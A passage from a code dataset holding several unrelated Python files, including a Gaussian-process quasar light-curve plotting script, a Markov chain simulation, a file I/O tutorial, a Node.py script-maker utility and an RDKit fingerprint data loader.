pyplot\nfrom gp.eval_gp import *\nfrom gp.trainGP import marginalLikelihood, pack_params\n\ndef mean(x,params):\n return 0\n\ndef covar(x,y,params):\n \"\"\"covar: covariance function\"\"\"\n return params.evaluate(x,y)\n\ndef dualBandExample(filename='../data/SDSSJ203817.37+003029.8.fits',\n constraints=None,basefilename='SDSSJ203817.37+003029.8',\n covarType='SF'):\n \"\"\"\n NAME:\n dualBandExample\n PURPOSE:\n show an example of a power-law structure function GP covariance function\n fit to an SDSS quasar for g and r\n INPUT:\n filename - filename with the data\n constraints - if None, use all constraints, if [] use no constraints!\n basefilename - basefilename for plots\n covarType - 'SF' or 'DRW'\n OUTPUT:\n writes several plots\n HISTORY:\n 2010-08-11 - Written - Bovy (NYU)\n \"\"\"\n file= fu.table_fields(filename)\n mjd_g= nu.array(file.mjd_g)/365.25\n g= nu.array(file.g)\n err_g= nu.array(file.err_g)\n mjd_r= nu.array(file.mjd_r)/365.25\n r= nu.array(file.r)\n err_r= 
nu.array(file.err_r)\n\n mask= (mjd_g != 0)*(g < 20.6)*(g > 19.7)#Adjust for non-g\n g= g[mask]\n g-= nu.mean(g)\n err_g= err_g[mask]\n mjd_g= mjd_g[mask]\n mjd_g-= nu.amin(mjd_g)\n meanErr_g= nu.mean(err_g)\n\n r= r[mask]\n r-= nu.mean(r)\n err_r= err_r[mask]\n mjd_r= mjd_r[mask]\n mjd_r-= nu.amin(mjd_r)\n meanErr_r= nu.mean(err_r)\n \n meanErr_gr= nu.mean(nu.sqrt(err_r**2.+err_g**2.))\n\n nu.random.seed(4)\n nGP=5\n nx=201\n params_mean= ()\n if covarType == 'SF':\n from powerlawSFgr import covarFunc\n params= {'logGamma': array([-7.33271548]), 'logGammagr': array([-10.5]), 'gamma': array([ 0.4821092]), 'gammagr': array([ 0.5])}\n params= {'logGamma': array([-7.79009776]), 'logGammagr': array([-28.0487848]), 'gamma': array([ 0.45918053]), 'gammagr': array([ 0.21333858])}\n else:\n from OUgr import covarFunc\n params= {'logl': array([ 1.94844503]), 'loglgr': array([ 7.36282174]), 'logagr2': array([ 1.0196474]), 'loga2': array([-0.00588868])}\n params= {'logl':-1.37742591,'loga':-3.47341754,\n 'loglgr': -2.3777,'logagr': -4.}\n params= {'logl': array([-1.38968195]), 'loglgr': array([-2.46684501]), 'logagr2': array([-6.62320832]), 'loga2': array([-3.52099305])}\n paramsSF= params\n cf= covarFunc(**params)\n params_covar= (cf)\n ndata= len(g)\n if constraints is None:\n listx= [(t,'g') for t in mjd_g]\n listx.extend([(t,'r') for t in mjd_r])\n listy= [m for m in g]\n listy.extend([m for m in r])\n listy= nu.array(listy)\n noise= [m for m in err_g]\n noise.extend([m for m in err_r])\n noise= nu.array(noise)\n trainSet= trainingSet(listx=listx,listy=listy,noise=noise)\n constraints= trainSet\n else:\n constraints= nu.array([])\n\n useconstraints= constraints\n txs= nu.linspace(-0.1,6.5,nx)\n xs= [(txs[ii],'g') for ii in range(nx)]\n xs.extend([(txs[ii],'r') for ii in range(nx)])\n GPsamples= eval_gp(xs,mean,covar,(),params_covar,nGP=nGP,constraints=useconstraints,tiny_cholesky=.00000001)\n thismean= 
calc_constrained_mean(xs,mean,params_mean,covar,params_covar,useconstraints)\n thiscovar= calc_constrained_covar(xs,covar,params_covar,useconstraints)\n #Calculate loglike\n if isinstance(constraints,trainingSet):\n (params,packing)= pack_params(cf)\n covarFuncName= inspect.getmodule(cf).__name__\n thisCovarClass= __import__(covarFuncName)\n loglike= marginalLikelihood(params,constraints,packing,\n thisCovarClass)\n\n plot.bovy_print()\n pyplot.plot(txs,GPsamples[0,:nx],'-',color='0.25')\n if isinstance(constraints,trainingSet):\n pyplot.plot(mjd_g,g,'k.',zorder=5,ms=10)\n title= re.split(r'_',basefilename)[0]\n if covarType == 'SF':\n method= '\\mathrm{power-law\\ structure\\ functions}'\n else:\n method= '\\mathrm{damped\\ random\\ walk}'\n plot.bovy_text(r'$\\mathrm{'+title+'\\ / \\ '+method+r'}$',title=True)\n if isinstance(constraints,trainingSet):\n plot.bovy_text(r'$\\log P({\\bf x}|\\mathrm{parameters}) = %5.2f$' %(-loglike),\n top_left=True)\n #pyplot.fill_between(xs,thismean-sc.sqrt(sc.diagonal(thiscovar)),thismean+sc.sqrt(sc.diagonal(thiscovar)),color='.75')\n for ii in range(1,nGP):\n pyplot.plot(txs,GPsamples[ii,:nx],'-',color=str(0.25+ii*.5/(nGP-1)))\n #pyplot.plot(txs,thismean[:nx],'k-',linewidth=2)\n if isinstance(constraints,trainingSet):\n pyplot.errorbar(6.15,-0.25,yerr=meanErr_g,color='k')\n pyplot.xlabel(r'$\\mathrm{MJD-constant}\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$g-\\langle g\\rangle\\ [\\mathrm{mag}]$')\n pyplot.xlim(-0.1,6.5)\n pyplot.ylim(-0.6,0.6)\n plot._add_ticks()\n plot.bovy_end_print(basefilename+'_fullg.ps')\n\n\n plot.bovy_print()\n pyplot.figure()\n pyplot.plot(txs,GPsamples[0,nx-1:-1],'-',color='0.25')\n if isinstance(constraints,trainingSet):\n pyplot.plot(mjd_r,r,'k.',zorder=5,ms=10)\n #plot.bovy_text(r'$\\mathrm{'+title+'\\ / \\ '+method+r'}$',title=True)\n #pyplot.fill_between(xs,thismean-sc.sqrt(sc.diagonal(thiscovar)),thismean+sc.sqrt(sc.diagonal(thiscovar)),color='.75')\n for ii in range(1,nGP):\n 
pyplot.plot(txs,GPsamples[ii,nx-1:-1],'-',color=str(0.25+ii*.5/(nGP-1)))\n #pyplot.plot(txs,thismean[nx-1:-1],'k-',linewidth=2)\n if isinstance(constraints,trainingSet):\n pyplot.errorbar(6.15,-0.25,yerr=meanErr_r,color='k')\n pyplot.xlabel(r'$\\mathrm{MJD-constant}\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$r-\\langle r\\rangle\\ [\\mathrm{mag}]$')\n pyplot.xlim(-0.1,6.5)\n pyplot.ylim(-0.6,0.6)\n plot._add_ticks()\n plot.bovy_end_print(basefilename+'_fullr.ps')\n\n\n plot.bovy_print()\n pyplot.figure()\n ii= 0\n colors= nu.array([GPsamples[ii,jj]-GPsamples[ii,jj+nx] for jj in range(nx)])\n if not isinstance(constraints,trainingSet):\n colors= colors-nu.mean(colors)\n pyplot.plot(txs,colors,'-',color='0.25')\n if isinstance(constraints,trainingSet):\n plot.bovy_plot(mjd_g,g-r,'k.',zorder=5,ms=10,overplot=True)\n #plot.bovy_text(r'$\\mathrm{'+basefilename+r'}$',title=True)\n #pyplot.fill_between(xs,thismean-sc.sqrt(sc.diagonal(thiscovar)),thismean+sc.sqrt(sc.diagonal(thiscovar)),color='.75')\n for ii in range(1,nGP):\n colors= nu.array([GPsamples[ii,jj]-GPsamples[ii,jj+nx] for jj in range(nx)])\n if not isinstance(constraints,trainingSet):\n colors= colors-nu.mean(colors)\n pyplot.plot(txs,colors,'-',color=str(0.25+ii*.5/(nGP-1)))\n plotthismean= nu.zeros(nx)\n for ii in range(nx):\n plotthismean[ii]= thismean[ii]-thismean[ii+nx]\n #pyplot.plot(txs,plotthismean,'k-',linewidth=2)\n if isinstance(constraints,trainingSet):\n pyplot.errorbar(6.15,-0.18,yerr=meanErr_gr,color='k')\n pyplot.xlabel(r'$\\mathrm{MJD-constant}\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$g-r- \\langle g - r \\rangle\\ [\\mathrm{mag}]$')\n pyplot.xlim(-0.1,6.5)\n if isinstance(constraints,trainingSet):\n pyplot.ylim(-0.25,.25)\n else:\n pass #pyplot.ylim(-10.,10.)\n plot._add_ticks()\n plot.bovy_end_print(basefilename+'_color.ps')\n\n if covarType == 'DRW':\n return\n\n #Plot structure functions\n\n #g\n plot.bovy_print()\n pyplot.figure()\n for ii in range(nGP):\n thisSample= GPsamples[ii,:nx]\n 
pyplot.loglog(sc.arange(1.,len(thisSample)/2)*(txs[1]-txs[0]),\n 2.*sc.var(thisSample)\\\n -2.*sc.correlate(thisSample-sc.mean(thisSample),thisSample-sc.mean(thisSample),\"same\")[1:len(thisSample)/2][::-1]/len(thisSample),\n color=str(0.25+ii*.5/(nGP-1)))\n xline= [(txs[1]-txs[0]),txs[len(txs)/2]]\n pyplot.loglog(xline,(nu.exp(paramsSF['logGamma'])*nu.array(xline))**(paramsSF['gamma']),'k--')\n pyplot.xlabel(r'$\\Delta t\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$\\mathrm{structure\\ function\\ in}\\ g$')\n #plot.bovy_text(r'$\\mathrm{SDSSJ203817.37+003029.8}$',title=True)\n plot.bovy_end_print(basefilename+'_structfuncg.ps')\n\n\n #r\n plot.bovy_print()\n pyplot.figure()\n for ii in range(nGP):\n thisSample= GPsamples[ii,nx-1:-1]\n pyplot.loglog(sc.arange(1.,len(thisSample)/2)*(txs[1]-txs[0]),\n 2.*sc.var(thisSample)\\\n -2.*sc.correlate(thisSample-sc.mean(thisSample),thisSample-sc.mean(thisSample),\"same\")[1:len(thisSample)/2][::-1]/len(thisSample),\n color=str(0.25+ii*.5/(nGP-1)))\n xline= [(txs[1]-txs[0]),txs[len(txs)/2]]\n pyplot.loglog(xline,(nu.exp(paramsSF['logGamma'])*nu.array(xline))**(paramsSF['gamma']),'k--')\n pyplot.xlabel(r'$\\Delta t\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$\\mathrm{structure\\ function\\ in}\\ r$')\n #plot.bovy_text(r'$\\mathrm{SDSSJ203817.37+003029.8}$',title=True)\n plot.bovy_end_print(basefilename+'_structfuncr.ps')\n\n\n #g-r\n plot.bovy_print()\n pyplot.figure()\n for ii in range(nGP):\n thisSample= nu.array([GPsamples[ii,jj]-GPsamples[ii,jj+nx] for jj in range(nx)])\n pyplot.loglog(sc.arange(1.,len(thisSample)/2)*(txs[1]-txs[0]),\n 2.*sc.var(thisSample)\\\n -2.*sc.correlate(thisSample-sc.mean(thisSample),thisSample-sc.mean(thisSample),\"same\")[1:len(thisSample)/2][::-1]/len(thisSample),\n color=str(0.25+ii*.5/(nGP-1)))\n xline= [(txs[1]-txs[0]),txs[len(txs)/2]]\n pyplot.loglog(xline,(nu.exp(paramsSF['logGammagr'])*nu.array(xline))**(paramsSF['gammagr']),'k--')\n pyplot.xlabel(r'$\\Delta t\\ [\\mathrm{yr}]$')\n 
pyplot.ylabel(r'$\\mathrm{color\\ structure\\ function}$')\n #plot.bovy_text(r'$\\mathrm{SDSSJ203817.37+003029.8}$',title=True)\n plot.bovy_end_print(basefilename+'_structfuncgr.ps')\n\nif __name__ == '__main__':\n if len(sys.argv) > 2:\n if 'like' in sys.argv[1]:\n constraints=[]\n else:\n constraints= None\n dualBandExample(covarType=sys.argv[2],basefilename=sys.argv[1],constraints=constraints)\n elif len(sys.argv) > 1:\n if 'like' in sys.argv[1]:\n constraints=[]\n else:\n constraints= None\n dualBandExample(basefilename=sys.argv[1],constraints=constraints)\n else:\n dualBandExample()\n","sub_path":"RC/fakedatagen/vq/dualBandExample.py","file_name":"dualBandExample.py","file_ext":"py","file_size_in_byte":10560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615167059","text":"\"\"\"\ntime:0(n)\nspace:o(n)\n\"\"\"\nclass Solution(object):\n def reorderLogFiles(self, logs):\n \"\"\"\n :type logs: List[str]\n :rtype: List[str]\n \"\"\"\n let_logs = [] #maintaing letter and digit logs separately\n dig_logs = []\n\n for i in range (0,len(logs)):\n ne = logs[i].split()\n \n if(ne[1].isnumeric()):\n dig_logs.append(str(logs[i]))\n \n else:\n let_logs.append(str(logs[i]))\n \n let_logs.sort(key = lambda x: x.split()[0]) #first sort through their ids for letter logs, then through the string\n let_logs.sort(key = lambda x: x.split()[1:])\n \n res = let_logs + dig_logs \n \n return res","sub_path":"Problem2.py","file_name":"Problem2.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"272239567","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom time import time\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\nclass MarkovChainType:\n\n def __init__(self, _alpha, _beta, _size):\n self.alpha_ = _alpha\n self.beta_ = _beta\n self.size_ = _size\n self.data_ = -0.5*np.ones(_size)\n self.step_ = 
.0\n self.p1_ = []\n self.p2_ = []\n\n def do_step_(self):\n for i in range(self.size_):\n if self.data_[i] < 0:\n if np.random.uniform() < self.alpha_:\n self.data_[i] += 1\n else:\n if np.random.uniform() < self.beta_:\n self.data_[i] -= 1\n\n def walk(self, _steps):\n while self.step_ < _steps:\n self.do_step_()\n temp, opt = np.histogram(self.data_, bins=[-1,0,1])\n self.p1_.append(temp[0]/self.size_)\n self.p2_.append(temp[1]/self.size_)\n self.step_ += 1\n del opt\n del temp\n\n def plotFigure(self, _file_name, _a,_b):\n plt.figure()\n plt.semilogx(np.arange(1.0, self.step_+1.0, 1.0), self.p1_, label= \"State 1\")\n plt.semilogx(np.arange(1.0, self.step_+1.0, 1.0), self.p2_, label= \"State 2\")\n plt.legend()\n plt.grid()\n plt.ylim(0.0,1.0)\n plt.title(r\"$\\alpha$ = {0: .2f}, $\\beta$ = {1:.2f}\".format(_a, _b))\n plt.xlabel(r\"numbers of steps \\(n\\)\")\n plt.ylabel(r\"probability \\(P\\)\")\n plt.tight_layout()\n plt.savefig(_file_name)\n plt.close()\n\ndef main():\n np.random.seed(int(time()))\n alpha_list = np.append(np.linspace(0.2, 0.8, 1),[0.01])\n beta_list = np.append(np.linspace(0.2, 0.8, 1),[0.01])\n a, b = np.meshgrid(alpha_list, beta_list)\n for i in range(len(alpha_list)):\n for j in range(len(beta_list)):\n s = MarkovChainType(a[i][j], b[i][j], 1000)\n s.walk(1000)\n alpha_label= int(a[i][j]*10)\n beta_label= int(b[i][j]*10)\n s.plotFigure(\"fig2_a_{0:d}_b_{1:d}.png\".format(alpha_label,beta_label), a[i][j], b[i][j] )\n del s\n return 0\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"CP2__Computational_Physics_II/Soluciones de Li/Computational-Physics-II-master/assignment_04/codes/4_2_markov_chain_dynamics.py","file_name":"4_2_markov_chain_dynamics.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"538884824","text":"\"\"\"\nIf we want to write a file, then we need to change the file mode to\n'w' which means writting files,\n'wb' 
which means writting-binary files.\nSpecial Note: When using “w” or “wb” modes, if the file already exists,\nit will be overwritten with no warning!\nWe can check if a file already exists before open by using on module.\n\"\"\"\n\nhandle = open(\"test.txt\", \"w\")\nhandle.write(\"This is a test!\")\n# We call the 'write' method to write some text to the file.\n# also we can use 'writelines' method that will accept a list of strings\n# that the handle will then write to disk in order.\nhandle.close() # always close the file after action\n\n# Now let's read the file that we just wrote\nhandle = open(\"test.txt\", \"r\")\nfor line in handle:\n print(line)\nhandle.close()\n\n\n\"\"\"\nPython has a neat little builtin called with which we can use to simplify\nreading and writing files. The with operator creates what is known as a\ncontext manager in Python that will automatically close the file\nwhen we are done processing it.\n\"\"\"\nwith open(\"test.txt\") as file_handler:\n for line in file_handler:\n print(line)\n\n\"\"\"\nWhat are we doing is \"handle = open(\"test.txt\")\" is replacing with\n\"with open(\"test.txt\") as file_handler:\"\nWe can do all usual I/O operations as we normally do with with code block.\nIf we leave the code block, the file will close and we can't use them anymore.\n'with' clause does it automaticlly.\n\"\"\"\n","sub_path":"day6/2_writting_file.py","file_name":"2_writting_file.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549923746","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n* Copyright (c) 2018 GIORGIO CACULLI \n*\n* Permission to use, copy, modify, and distribute this software for any\n* purpose with or without fee is hereby granted, provided that the above\n* copyright notice and this permission notice appear in all copies.\n*\n* THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n* WITH 
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\"\"\"\nfrom meacore.modele import Modele\n\nclass ModeleC(Modele):\n def __init__(self, fiche_1, fiche_2, methode):\n self.vnut_1 = fiche_1.get_energie()\n self.pp_1 = fiche_1.get_proteines()\n self.pg_1 = fiche_1.get_glucides()\n self.pl_1 = fiche_1.get_lipides()\n self.vnut_2 = fiche_2.get_energie()\n self.pp_2 = fiche_2.get_proteines()\n self.pg_2 = fiche_2.get_glucides()\n self.pl_2 = fiche_2.get_lipides()\n self.methode = methode\n self.calculate_kcx(self.get_kcl(), 0, self.get_kcp())\n\n def calculate_kcl(self, methode):\n if methode == 1:\n step1 = (self.vnut_1 * self.pp_2) + (self.vnut_2 * self.pp_1)\n step2 = (self.pl_1 * self.pp_2) - (self.pl_2 * self.pp_1)\n return step1 / step2\n elif methode == 2:\n step1 = (self.vnut_1 * self.pp_2) + (self.vnut_2 * self.pp_1)\n step2 = (self.pl_1 * self.pp_2) - (self.pl_2 * self.pp_1)\n return step1 / step2\n elif methode == 3:\n step1 = self.vnut_1 - (self.get_kcp() * self.pp_1)\n step2 = self.pl_1\n return step1 / step2\n elif methode == 4:\n step1 = self.vnut_2 - (self.get_kcp() * self.pp_2)\n step2 = self.pl_2\n return step1 / step2\n\n def calculate_kcp(self, methode):\n if methode == 1:\n step1 = self.vnut_1 - (self.get_kcl() * self.pl_1)\n step2 = self.pp_1\n return step1 / step2\n elif methode == 2:\n step1 = self.vnut_2 - (self.get_kcl() * self.pl_2)\n step2 = self.pp_2\n return step1 / step2\n elif methode == 3:\n step1 = (self.vnut_1 * self.pl_2) + (self.vnut_2 * self.pl_1)\n step2 = (self.pp_1 * self.pl_2) - (self.pp_2 * self.pl_1)\n return step1 / step2\n elif methode == 4:\n step1 = 
(self.vnut_1 * self.pl_2) + (self.vnut_2 * self.pl_1)\n step2 = (self.pp_1 * self.pl_2) - (self.pp_2 * self.pl_1)\n return step1 / step2\n\n def set_methode(self, methode):\n self.methode = methode\n\n def get_methode(self):\n return self.methode\n\n def get_kcl(self):\n return self.calculate_kcl(self.get_methode())\n\n def get_kcp(self):\n return self.calculate_kcp(self.get_methode())\n\n def calculate_kcx(self, kcl, kcg, kcp):\n if self.get_methode() == 1 or self.get_methode() == 2:\n self.set_kcl(kcl)\n self.set_kcp(kcp)\n elif self.get_methode() == 3 or self.get_methode() == 4:\n self.set_kcp(kcp)\n self.set_kcl(kcl)\n self.set_kcg(kcg)\n\n\n","sub_path":"meacore/modele_c.py","file_name":"modele_c.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346482271","text":"def detect_anagrams(word, candidates):\n wordlist=list(word.lower())\n vcandidates=[]\n for words in candidates:\n \tif word.lower()==words.lower():\n \t\tcontinue\n \telse:\n \t\ttemp=wordlist[:]\n \t\tif len(words)==len(wordlist):\n \t\t\tfor i in range(len(words)):\n \t\t\t\tif words[i].lower() in temp:\n \t\t\t\t\ttemp.remove(words[i].lower())\n \t\tif len(temp)==0 :\n \t\t\tvcandidates.append(words)\n return vcandidates\n","sub_path":"anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351441389","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"MuonExercise2\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\n# initialize MessageLogger and output report\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1000\nprocess.MessageLogger.cerr.threshold = 'INFO'\nprocess.MessageLogger.cerr.INFO = cms.untracked.PSet(\n limit = 
cms.untracked.int32(0)\n)\n\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(False),\nSkipEvent = cms.untracked.vstring('ProductNotFound'))\n\nprocess.source = cms.Source(\"PoolSource\", fileNames = cms.untracked.vstring('file:/eos/user/c/cmsdas/short-exercises/muon/dymm_2.root'))\n\nprocess.demo = cms.EDAnalyzer(\"MuonExercise2\",\n MuonTag = cms.InputTag(\"slimmedMuons\"),\n GenPartTag = cms.InputTag(\"prunedGenParticles\"),\n UseRochCorr = cms.untracked.bool(False),\n RndmSeed = cms.untracked.uint32(2345)\n)\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('histos2.root')\n)\n\nprocess.p = cms.Path(process.demo)\n","sub_path":"CMSSW_10_6_8/src/MuonExercises/MuonExercises2/MuonExercise2.py","file_name":"MuonExercise2.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"545996597","text":"# Copyright (c) 2017 Niklas Rosenstein\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE 
WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"\nHelper function to create script files for pure Python code, ppy modules or\nshell commands. Uses the Python #distlib package.\n\"\"\"\n\nimport os\nimport six\ntry:\n from distlib.scripts import ScriptMaker as _ScriptMaker\nexcept ImportError as exc:\n from pip._vendor.distlib.scripts import ScriptMaker as _ScriptMaker\n\nargschema = require('../argschema')\n\n\nclass ScriptMaker:\n \"\"\"\n Our own script maker class. It is unlike #distutils.script.ScriptMaker.\n \"\"\"\n\n def __init__(self, directory):\n self.directory = directory\n self.path = []\n self.pythonpath = []\n\n def _init_code(self):\n if not self.path and not self.pythonpath:\n return ''\n code = '# Initialize environment variables (from ScriptMaker).\\nimport os,sys\\n'\n if self.path:\n path = [os.path.abspath(x) for x in self.path]\n code += 'os.environ[\"PATH\"] = os.pathsep.join({path!r}) + '\\\n 'os.pathsep + os.environ.get(\"PATH\", \"\")\\n'.format(path=path)\n if self.pythonpath:\n path = [os.path.abspath(x) for x in self.pythonpath]\n code += '_add_pythonpath = {pythonpath!r}\\n'\\\n 'sys.path.extend(_add_pythonpath); del _add_pythonpath\\n'.format(pythonpath=path)\n return code + '\\n'\n\n def make_python(self, script_name, code):\n \"\"\"\n Uses #distlib.scripts.ScriptMaker to create a Python script that is invoked\n with this current interpreter. The script runs *code* and will be created\n in the *directory* specified in the constructor of this #ScriptMaker.\n\n # Parameters\n script_name (str): The name of the script to create.\n code (str): The python code to run.\n\n # Returns\n A list of filenames created. 
Depending on the platform, more than one file\n might be created to support multiple use cases (eg. and `.exe` but also a\n bash-script on Windows).\n \"\"\"\n\n if os.name == 'nt' and (not script_name.endswith('.py') \\\n or not script_name.endswith('.pyw')):\n # ScriptMaker._write_script() will split the extension from the script\n # name, thus if there is an extension, we should add another suffix so\n # the extension doesn't get lost.\n script_name += '.py'\n\n maker = _ScriptMaker(None, self.directory)\n maker.clobber = True\n maker.variants = set(('',))\n maker.set_mode = True\n maker.script_template = self._init_code() + code\n return maker.make(script_name + '=isthisreallynecessary')\n\n def make_command(self, script_name, args):\n \"\"\"\n Uses #make_python() to create a Python script that uses the #subprocess\n module to run the command specified with *args*.\n \"\"\"\n\n code = 'import sys, subprocess\\n'\\\n 'sys.exit(subprocess.call({!r}))\\n'.format(args)\n return self.make_python(script_name, code)\n\n def make_nodepy(self, script_name, filename, reference_dir=None):\n \"\"\"\n Uses #make_pyton() to create a script that invokes the current Python and\n Node.py runtime to run the Node.py module specified by *filename*. If a\n *reference_dir* is specified, that directory will be used as a the base\n directory to start searching for `nodepy_modules/` directories instead of\n the current working directory.\n \"\"\"\n\n args = ['--keep-arg0']\n if reference_dir:\n # Find modules in the reference directory.\n args.append('--current-dir')\n args.append(reference_dir)\n args.append(filename)\n\n code = 'import sys, nodepy;\\n'\\\n 'sys.argv = [sys.argv[0]] + {args!r} + sys.argv[1:]\\n'\\\n 'sys.exit(nodepy.main())\\n'.format(args=args)\n return self.make_python(script_name, code)\n\n def make_wrapper(self, script_name, target_program):\n \"\"\"\n Creates a Python wrapper script that will invoke *target_program*. 
Before\n the program is invoked, the environment variables PATH and PYTHONPATH will\n be prefixed with the paths from *path* and *pythonpath*.\n \"\"\"\n\n if not os.path.isabs(target_program):\n raise ValueError('target_program must be an absolute path')\n\n code = 'import subprocess, sys\\n'\\\n 'sys.exit(subprocess.call([{program!r}] + sys.argv[1:]))\\n'\\\n .format(program=target_program)\n return self.make_python(script_name, code)\n","sub_path":"lib/util/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"154877899","text":"from Calculator.Square import squaring\nfrom Calculator.Division import division\nfrom Statistics.Mean import mean\n\ndef samplevariance(a):\n try:\n a_mean = mean(a)\n n = len(a)\n x = 0\n for i in a:\n x = x + squaring(i-a_mean)\n return round(division(x, (n-1)), 7)\n except ZeroDivisionError:\n print(\"Error: Can't Divide by 0\")\n except ValueError:\n print (\"Error: Check your data inputs\")","sub_path":"Statistics/SampleVariance.py","file_name":"SampleVariance.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185749502","text":"import pandas as pd\nimport os\nimport numpy as np\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nimport pickle\nimport pubchempy\n\nPATH = '.'\nfingerprints = os.path.join(PATH, 'Fingerprints')\ndata_csv = 'Information_Files\\\\enamine.csv' \n\nclass dmso:\n \"\"\"\n Class used to easily parse dmso data set into fingerprints and one-hot encoded\n categorical labels\n \"\"\"\n def __init__(self):\n self.mapping = None\n self.data = None\n\n def obtain_data(self, morgan=False, maccs=False, pubchem=False,\n categorical_to_onehot=True, nbits = 1024):\n \"\"\"\n The meat and cheese!\n Opens the data set and transforms it as desired.\n :param fingerprint: Set to False to prevent 
smiles -> fingerprint conversion\n :param categorical_to_onehot: Set to False to prevent label strings -> one hot conversion\n :return: Stores\n \"\"\"\n self.nbits = nbits\n self.data = pd.read_csv(data_csv)\n if categorical_to_onehot:\n self.mapping = self.one_hot(self.data['Solubility'])\n self.data['Solubility'] = self.data['Solubility'].map(self.mapping)\n if morgan:\n self.data['fingerprints'] = self.data['SMILES'].apply(self.morgan)\n elif maccs:\n self.data['fingerprints'] = self.data['SMILES'].apply(self.maccs)\n elif pubchem:\n self.data['fingerprints'] = self.data['SMILES'].apply(self.pubchem)\n\n def one_hot(self, column):\n \"\"\"\n One hot encodes a column of arbitrary categories\n :param column: a pandas dataframe\n :return: a dict mapping each category to its respective list\n ex: for the two categories ['Soluble', 'Insoluble'] this function will return\n {'Soluble':array([0,1]), 'Insoluble': array([1,0])}\n \"\"\"\n values = set(column)\n values = sorted(list(values))\n ints = [c for c, _ in enumerate(values)]\n number_values = len(values)\n int_map = {a: ints[c] for c, a in enumerate(values)}\n for thingy in int_map:\n zeroes = np.zeros(number_values, dtype='int32')\n zeroes[int_map[thingy]] = 1\n int_map[thingy] = zeroes\n return int_map\n\n def morgan(self, column):\n x = Chem.MolFromSmiles(column)\n y = list(AllChem.GetMorganFingerprintAsBitVect(x, 2, self.nbits))\n return y\n\n def maccs(self, column):\n x = Chem.MolFromSmiles(column)\n y = list(AllChem.GetMACCSKeysFingerprint(x))\n return y\n\n def pubchem(self, column):\n try:\n x = pubchempy.get_compounds(column, namespace='smiles')[0].cactvs_fingerprint\n y = list(x)\n except:\n print('lol')\n return None\n return y\n\nif __name__== '__main__':\n nbits = 1024\n if 'morgan_{}_df.p'.format(nbits) not in os.listdir(fingerprints):\n x = dmso()\n x.obtain_data(morgan=True, nbits=nbits)\n print('done yo')\n pickle.dump(x.data, open('Fingerprints\\\\morgan_df_{}.p'.format(nbits), 'wb+'))\n \n del 
